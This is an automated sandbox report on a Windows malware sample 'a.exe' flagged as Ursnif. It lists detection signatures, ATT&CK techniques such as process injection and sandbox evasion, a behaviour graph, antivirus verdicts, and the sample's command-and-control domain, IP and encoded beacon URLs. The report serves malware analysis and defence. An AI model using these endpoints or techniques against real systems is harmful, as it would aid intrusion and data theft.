            Source: Yara matchFile source: Process Memory Space: a.exe PID: 4280, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.462274472.0000000001B4C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362892848.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362944534.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363046153.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362984170.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362843477.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363021516.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363119118.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.363077727.0000000001D48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: a.exe PID: 4280, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection112Rootkit4Credential API Hooking3System Time Discovery1Remote ServicesCredential API Hooking3Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Query Registry1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerSecurity Software Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion21NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncSystem Information Discovery14Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385479 Sample: a.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 30 resolver1.opendns.com 2->30 32 8.8.8.8.in-addr.arpa 2->32 34 1.0.0.127.in-addr.arpa 2->34 38 Found malware configuration 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected AntiVM3 2->42 44 7 other signatures 2->44 7 a.exe 3 2->7         started        11 iexplore.exe 1 55 2->11         started        13 iexplore.exe 2 83 2->13         started        15 mshta.exe 2->15         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\a.exe.log, ASCII 7->28 dropped 46 Writes or reads registry keys via WMI 7->46 48 Writes registry values via WMI 7->48 50 Injects a PE file into a foreign processes 7->50 17 a.exe 7->17         started        19 iexplore.exe 31 11->19         started        22 iexplore.exe 29 11->22         started        24 iexplore.exe 29 11->24         started        26 iexplore.exe 36 13->26         started        signatures6 process7 dnsIp8 36 2q7mfx2.xyz 142.93.7.187, 49739, 49740, 49741 DIGITALOCEAN-ASNUS United States 19->36

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            a.exe46%VirustotalBrowse
            a.exe19%MetadefenderBrowse
            a.exe31%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            4.2.a.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            4.2.a.exe.d60000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            0.2.a.exe.310d9b4.2.unpack100%AviraTR/Patched.Ren.Gen4Download File

            Domains

            SourceDetectionScannerLabelLink
            2q7mfx2.xyz0%VirustotalBrowse
            1.0.0.127.in-addr.arpa0%VirustotalBrowse
            8.8.8.8.in-addr.arpa0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://2q7mfx2.xyz/ddsadasdsaasdasdasd/nCQsOTqfa/4drLDa3auEFQqSoE0vyq/5xI8GCN1yHL5YcN3EBj/mfCnwe6xtj0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://2q7mfx2.xyz/favicon.ico0%Avira URL Cloudsafe
            http://2q7mfx2.xyz/ddsadasdsaasdasdasd/nCQsOTqfa/4drLDa3auEFQqSoE0vyq/5xI8GCN1yHL5YcN3EBj/mfCnwe6xtjDp36cmouaBCM/5WXgtFq_2BgKp/PDd6mPao/VUS6J3k6OdP2bm_2B0Sh5Sb/v4qaeiBWrX/itXnEXJVNYim4ybL5/cIrwdun4JuQa/iFtQQTarJN7/ou3bA61QNiTDuh/w23BEo_2BStwd/6tUmvLY.pal0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://2q7mfx2.xyz/ddsadasdsaasdasdasd/pVvzK0_2/FwDvnZbRILJs4gC4ZNCtKHr/k327Dz9kpG/ZIs5yRxNJXU0MDx7K0%Avira URL Cloudsafe
            http://www.carterandcone.comC0%URL Reputationsafe
            http://www.carterandcone.comC0%URL Reputationsafe
            http://www.carterandcone.comC0%URL Reputationsafe
            http://www.founder.com.cn/cns0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fonts.comic7fj0%Avira URL Cloudsafe
            http://2q7mfx2.xyz/ddsadasdsaasdasdasd/akOFAAemOaw/GRWDQgHTmj_2BB/0SsNgHXf0_2F8YRF3MF_2/BTXUUhGsccvU0%Avira URL Cloudsafe
            http://2q7mfx2.xyz/ddsadasdsaasdasdasd/akOFAAemOaw/GRWDQgHTmj_2BB/0SsNgHXf0_2F8YRF3MF_2/BTXUUhG0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://2q7mfx2.xyz/ddsadasdsaasdasdasd/pVvzK0_2/FwDvnZbRILJs4gC4ZNCtKHr/k327Dz9kpG/ZIs5yRxNJXU0MDx7K/1oYc2LXr26Jn/g5cPh2VKvvb/yvDaP_2F5_2F_2/BJc306ZiYZoF1QKdSMJJW/mGSWnCTz_2FMEjKy/DiOWbVEp8jQjHYx/7HEU8s2PxBoZ2q0K8s/zFYWNQgho/NDIqciBsagELw6U9Ykcj/Yn73Zb3X.pal0%Avira URL Cloudsafe
            http://www.fonts.comnHf0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://2q7mfx2.xyz/favicon.ico~0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/P0%Avira URL Cloudsafe
            http://2q7mfx2.xyz/ddsadasdsaasdasdasd/akOFAAemOaw/GRWDQgHTmj_2BB/0SsNgHXf0_2F8YRF3MF_2/BTXUUhGsccvUTI0X/YtzO0a_2B5tA_2F/PAuzboBrzi2NYt1j_2/BTeCTzZqB/aUt8BZ0LT0UMxiZA_2FM/6a4EDRiKQ_2BhQNQcOC/Rn9l8Tt0802pyLpFPogw_2/F4g0qrzhYPym6/9lYbjfC9/i8invrB3NNgg4mE9K5Lu1uv/_2F.pal0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fonts.commf00%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.fonts.comcqf0%Avira URL Cloudsafe
            http://www.wikipedia.com/0%URL Reputationsafe
            http://www.wikipedia.com/0%URL Reputationsafe
            http://www.wikipedia.com/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            2q7mfx2.xyz
            142.93.7.187
            truetrueunknown
            resolver1.opendns.com
            208.67.222.222
            truefalse
              high
              1.0.0.127.in-addr.arpa
              unknown
              unknownfalseunknown
              8.8.8.8.in-addr.arpa
              unknown
              unknownfalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://2q7mfx2.xyz/favicon.icofalse
              • Avira URL Cloud: safe
              unknown
              http://2q7mfx2.xyz/ddsadasdsaasdasdasd/nCQsOTqfa/4drLDa3auEFQqSoE0vyq/5xI8GCN1yHL5YcN3EBj/mfCnwe6xtjDp36cmouaBCM/5WXgtFq_2BgKp/PDd6mPao/VUS6J3k6OdP2bm_2B0Sh5Sb/v4qaeiBWrX/itXnEXJVNYim4ybL5/cIrwdun4JuQa/iFtQQTarJN7/ou3bA61QNiTDuh/w23BEo_2BStwd/6tUmvLY.palfalse
              • Avira URL Cloud: safe
              unknown
              http://2q7mfx2.xyz/ddsadasdsaasdasdasd/pVvzK0_2/FwDvnZbRILJs4gC4ZNCtKHr/k327Dz9kpG/ZIs5yRxNJXU0MDx7K/1oYc2LXr26Jn/g5cPh2VKvvb/yvDaP_2F5_2F_2/BJc306ZiYZoF1QKdSMJJW/mGSWnCTz_2FMEjKy/DiOWbVEp8jQjHYx/7HEU8s2PxBoZ2q0K8s/zFYWNQgho/NDIqciBsagELw6U9Ykcj/Yn73Zb3X.palfalse
              • Avira URL Cloud: safe
              unknown
              http://2q7mfx2.xyz/ddsadasdsaasdasdasd/akOFAAemOaw/GRWDQgHTmj_2BB/0SsNgHXf0_2F8YRF3MF_2/BTXUUhGsccvUTI0X/YtzO0a_2B5tA_2F/PAuzboBrzi2NYt1j_2/BTeCTzZqB/aUt8BZ0LT0UMxiZA_2FM/6a4EDRiKQ_2BhQNQcOC/Rn9l8Tt0802pyLpFPogw_2/F4g0qrzhYPym6/9lYbjfC9/i8invrB3NNgg4mE9K5Lu1uv/_2F.palfalse
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.fontbureau.com/designersGa.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                high
                http://2q7mfx2.xyz/ddsadasdsaasdasdasd/nCQsOTqfa/4drLDa3auEFQqSoE0vyq/5xI8GCN1yHL5YcN3EBj/mfCnwe6xtj~DFBEABCA28CF22FEB6.TMP.32.dr, {EB16AD66-9BDD-11EB-90E4-ECF4BB862DED}.dat.32.drfalse
                • Avira URL Cloud: safe
                unknown
                http://www.fontbureau.com/designers/?a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                  high
                  http://www.founder.com.cn/cn/bThea.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.fontbureau.com/designers?a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                    high
                    http://www.tiro.coma.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.amazon.com/msapplication.xml.23.drfalse
                      high
                      http://www.fontbureau.com/designersa.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmp, a.exe, 00000000.00000003.220468718.0000000005B7B000.00000004.00000001.sdmpfalse
                        high
                        http://www.goodfont.co.kra.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.twitter.com/msapplication.xml5.23.drfalse
                          high
                          http://www.sajatypeworks.coma.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.typography.netDa.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.founder.com.cn/cn/cThea.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.galapagosdesign.com/staff/dennis.htma.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://fontfabrik.coma.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://2q7mfx2.xyz/ddsadasdsaasdasdasd/pVvzK0_2/FwDvnZbRILJs4gC4ZNCtKHr/k327Dz9kpG/ZIs5yRxNJXU0MDx7K~DFE8E2529E38BBDC04.TMP.32.dr, {EB16AD68-9BDD-11EB-90E4-ECF4BB862DED}.dat.32.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.carterandcone.comCa.exe, 00000000.00000003.216296847.0000000005B7D000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.founder.com.cn/cnsa.exe, 00000000.00000003.214915238.0000000005B7A000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.galapagosdesign.com/DPleasea.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fonts.comic7fja.exe, 00000000.00000003.213661113.0000000005B8B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://2q7mfx2.xyz/ddsadasdsaasdasdasd/akOFAAemOaw/GRWDQgHTmj_2BB/0SsNgHXf0_2F8YRF3MF_2/BTXUUhGsccvU~DF20E1CBD0001D92CD.TMP.32.dr, {EB16AD6A-9BDD-11EB-90E4-ECF4BB862DED}.dat.32.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://2q7mfx2.xyz/ddsadasdsaasdasdasd/akOFAAemOaw/GRWDQgHTmj_2BB/0SsNgHXf0_2F8YRF3MF_2/BTXUUhGa.exe, 00000004.00000002.482582082.0000000001F60000.00000002.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fonts.coma.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                            high
                            http://www.sandoll.co.kra.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.urwpp.deDPleasea.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.zhongyicts.com.cna.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.reddit.com/msapplication.xml4.23.drfalse
                              high
                              http://www.sakkal.coma.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fonts.comnHfa.exe, 00000000.00000003.213740030.0000000005B8B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                                high
                                http://www.fontbureau.coma.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.galapagosdesign.com/a.exe, 00000000.00000003.221382499.0000000005BAE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://2q7mfx2.xyz/favicon.ico~imagestore.dat.33.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.nytimes.com/msapplication.xml3.23.drfalse
                                    high
                                    http://www.galapagosdesign.com/Pa.exe, 00000000.00000003.221382499.0000000005BAE000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.carterandcone.comla.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cn/a.exe, 00000000.00000003.215218795.0000000005B72000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNa.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cna.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmla.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmp, a.exe, 00000000.00000003.220383197.0000000005B79000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.fonts.commf0a.exe, 00000000.00000003.213719719.0000000005B8B000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.youtube.com/msapplication.xml7.23.drfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fonts.comcqfa.exe, 00000000.00000003.213699842.0000000005B8B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designers8a.exe, 00000000.00000002.247989835.0000000006D82000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.wikipedia.com/msapplication.xml6.23.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.live.com/msapplication.xml2.23.drfalse
                                              high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              142.93.7.187
                                              2q7mfx2.xyzUnited States
                                              14061DIGITALOCEAN-ASNUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:385479
                                              Start date:12.04.2021
                                              Start time:15:22:17
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 8m 47s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:a.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:38
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@14/37@6/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 3.3% (good quality ratio 2.6%)
                                              • Quality average: 68.7%
                                              • Quality standard deviation: 39.3%
                                              HCA Information:
                                              • Successful, ratio: 96%
                                              • Number of executed functions: 22
                                              • Number of non-executed functions: 1
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 104.43.139.144, 92.122.145.220, 104.42.151.234, 13.88.21.125, 13.64.90.137, 184.30.24.56, 20.82.210.154, 93.184.221.240, 92.122.213.194, 92.122.213.247, 20.54.26.129, 88.221.62.148, 20.82.209.183, 152.199.19.161
                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, updates.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              15:23:19API Interceptor1x Sleep call for process: a.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              resolver1.opendns.comswlsGbeQwT.dllGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1048628209.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-69564892.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1813856412.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1776123548.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-647734423.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1579869720.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-895003104.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-806281169.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1747349663.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1822768538.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-583955381.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1312908141.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1612462533.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1669060840.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-921217151.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1641473761.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-1570454889.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-116291302.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222
                                              document-110658411.xlsGet hashmaliciousBrowse
                                              • 208.67.222.222

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              DIGITALOCEAN-ASNUS2cyu3QImqv.exeGet hashmaliciousBrowse
                                              • 138.197.128.121
                                              Linux_Recovery.exeGet hashmaliciousBrowse
                                              • 159.203.148.225
                                              ScHost.exeGet hashmaliciousBrowse
                                              • 138.197.53.157
                                              Five.exeGet hashmaliciousBrowse
                                              • 138.197.53.157
                                              visa.exeGet hashmaliciousBrowse
                                              • 104.236.24.153
                                              visa.exeGet hashmaliciousBrowse
                                              • 104.236.24.153
                                              6BympvyPAv.exeGet hashmaliciousBrowse
                                              • 138.197.53.157
                                              mapdata.dllGet hashmaliciousBrowse
                                              • 138.68.46.133
                                              SecuriteInfo.com.Variant.Bulz.421173.18141.exeGet hashmaliciousBrowse
                                              • 139.59.164.118
                                              PO.exeGet hashmaliciousBrowse
                                              • 206.189.144.22
                                              SHIPMENT SCHEDULE 1.exeGet hashmaliciousBrowse
                                              • 178.62.225.201
                                              P O 2200182.exeGet hashmaliciousBrowse
                                              • 68.183.193.20
                                              Three.exeGet hashmaliciousBrowse
                                              • 138.197.53.157
                                              Four.exeGet hashmaliciousBrowse
                                              • 138.197.53.157
                                              Six.exeGet hashmaliciousBrowse
                                              • 138.197.53.157
                                              One.exeGet hashmaliciousBrowse
                                              • 138.197.53.157
                                              Five.exeGet hashmaliciousBrowse
                                              • 138.197.53.157
                                              Two.exeGet hashmaliciousBrowse
                                              • 138.197.53.157
                                              ScHost.exeGet hashmaliciousBrowse
                                              • 138.197.53.157
                                              AQJEKNHnWK.exeGet hashmaliciousBrowse
                                              • 67.205.188.68

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a.exe.log
                                              Process:C:\Users\user\Desktop\a.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.355304211458859
                                              Encrypted:false
